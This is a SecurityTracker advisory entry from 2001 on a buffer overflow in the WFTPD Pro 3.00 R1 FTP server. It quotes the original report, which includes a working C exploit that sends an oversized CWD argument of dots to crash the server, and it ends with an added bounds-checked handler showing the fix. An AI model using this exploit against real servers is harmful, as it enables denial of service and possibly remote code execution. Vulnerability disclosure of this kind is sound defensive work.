SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   WFTPD Pro
Vendors:   Texas Imperial Software
Texas Imperial Software's WFTPD Pro FTP Server for Windows NT/2000 May Execute Arbitrary Code and Can Be Crashed Remotely
SecurityTracker Alert ID:  1000987
SecurityTracker URL:  http://securitytracker.com/id/1000987
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 5 2001
Impact:   Denial of service via network, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 3.00 R1, possibly others
Description:   The WFTPD Pro FTP server for Windows NT/2000 contains a vulnerability that allows a remote user to crash the server and possibly execute arbitrary code on the server.

It is reported that sending a command (cwd) followed by a long argument (~500 '.' characters) causes the server to crash. This buffer overflow may be usable to execute arbitrary commands on the server.

The author has reportedly been contacted.

A demonstration exploit is contained in the original report.

Impact:   A user can remotely cause the server to crash and may be able to remotely execute arbitrary commands on the server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.wftpd.com
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Re: Texas Imperial Software's WFTPD Pro FTP Server for Windows NT/2000 May Execute Arbitrary Code and Can Be Crashed Remotely
This is a follow-up message. The vendor confirms the bug and has assigned a bug ID number to it.



 Source Message Contents

Subject:  WFTPD Pro 3.00 R1 Buffer Overflow


When sending a command (cwd) followed by a long argument (~500 char '.')
the server crashes with:


Anwendungspopup: WFTPD Service Control: 
WFTPD.EXE - Fehler in Anwendung: 
Die Anweisung in "0x2e2e2e2e" verweist auf 
Speicher 
in "0x2e2e2e2e". Der Vorgang
werden.

which means in English: Exception fault at: 0x2e2e2e2e
reading from 0x2e2e2e2e is not possible...


Executing arbitrary code is possible


The author has been contacted

----------------------
se00020@fhs-hagenberg.ac.at or
se00020@lion.cc

Tested on win2k using trial version of WFTPD 3.00 R1


Simple exploit:

//WFTPD Pro 3.00 R1 Buffer Overflow exploit
//written by se00020@fhs-hagenberg.ac.at

#include <stdio.h>
#include <winsock.h>
#include <windows.h>
#include <malloc.h>

void main(){
	SOCKET sock_victim;
	WORD version=MAKEWORD(1,1);
	WSADATA wsadata;
	SOCKADDR_IN victim;
	int sockid;
	char buffer[1024];
	char exploitbuffer[800]={"CWD "};
	char recvbuffer[1024];

	WSAStartup(version, &wsadata);

	//connect to the FTP control port of the test server
	sock_victim=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	victim.sin_family=AF_INET;
	victim.sin_addr.s_addr=inet_addr("10.17.3.44");
	victim.sin_port=htons(21);
	sockid=connect(sock_victim, (sockaddr*) &victim, sizeof(victim));

	//read the banner, then log in as user "test"
	recv(sock_victim, recvbuffer, sizeof(recvbuffer),0);
	memset(recvbuffer, '\0',sizeof(recvbuffer));
	send(sock_victim, "USER test\r\n",strlen("USER test\r\n"),0);
	recv(sock_victim, recvbuffer, sizeof(recvbuffer),0);
	memset(recvbuffer, '\0',sizeof(recvbuffer));
	send(sock_victim, "PASS\r\n",strlen("PASS\r\n"),0);
	recv(sock_victim, recvbuffer, sizeof(recvbuffer),0);
	memset(recvbuffer, '\0',sizeof(recvbuffer));

	//CWD followed by a long run of '.' characters
	memset(exploitbuffer+4,'.',sizeof(exploitbuffer)-4);
	sprintf(buffer,"%s\r\n",exploitbuffer);

	send(sock_victim, buffer , sizeof(buffer),0);
	recv(sock_victim, recvbuffer, sizeof(recvbuffer),0);

	closesocket(sockid);
	closesocket(sock_victim);

}
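
The following is an added example, not part of the original report and not the vendor's code: a bounds-checked handler for the CWD argument, showing the length check whose absence the "Boundary error" cause describes. The function names, the 260-byte path buffer and the choice of reply codes are assumptions made for illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define FTP_PATH_MAX 260  /* assumed size of the server's path buffer */

/* Reply codes as defined in RFC 959. */
enum { FTP_CWD_OK = 250, FTP_LINE_REJECTED = 500, FTP_BAD_ARG = 501 };

/* Validate one received command line and copy the CWD argument into out.
 * line need not be NUL-terminated; len is the byte count actually received.
 * Only the empty string is written to out unless the whole argument fits. */
int cwd_copy_arg(const char *line, size_t len, char *out, size_t out_size)
{
    size_t i, arg_len;

    if (out_size == 0) return FTP_LINE_REJECTED;
    out[0] = '\0';
    /* Strip the trailing CRLF (or bare LF) sent by the client. */
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r')) len--;
    if (len < 4 || line[3] != ' ') return FTP_LINE_REJECTED;
    for (i = 0; i < 3; i++)              /* FTP verbs are case-insensitive */
        if (toupper((unsigned char)line[i]) != "CWD"[i]) return FTP_LINE_REJECTED;
    arg_len = len - 4;
    if (arg_len == 0) return FTP_BAD_ARG;
    /* The boundary check: length is compared before any byte is copied. */
    if (arg_len >= out_size) return FTP_LINE_REJECTED;
    for (i = 0; i < arg_len; i++)        /* no NUL or control bytes in a path */
        if ((unsigned char)line[4 + i] < 0x20) return FTP_BAD_ARG;
    memcpy(out, line + 4, arg_len);
    out[arg_len] = '\0';
    return FTP_CWD_OK;
}

/* Constructed input: "cwd " + n dots + CRLF, the shape described in the report. */
int reply_for_dots(size_t n)
{
    char line[1024], path[FTP_PATH_MAX];
    if (n > sizeof(line) - 6) return -1;
    memcpy(line, "cwd ", 4);
    memset(line + 4, '.', n);
    memcpy(line + 4 + n, "\r\n", 2);
    return cwd_copy_arg(line, 4 + n + 2, path, sizeof(path));
}

int main(void)
{
    /* Exit status 0 when 500 dots are refused and a short argument is accepted. */
    return !(reply_for_dots(500) == FTP_LINE_REJECTED && reply_for_dots(3) == FTP_CWD_OK);
}
```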

 
 



Copyright 2021, SecurityGlobal.net LLC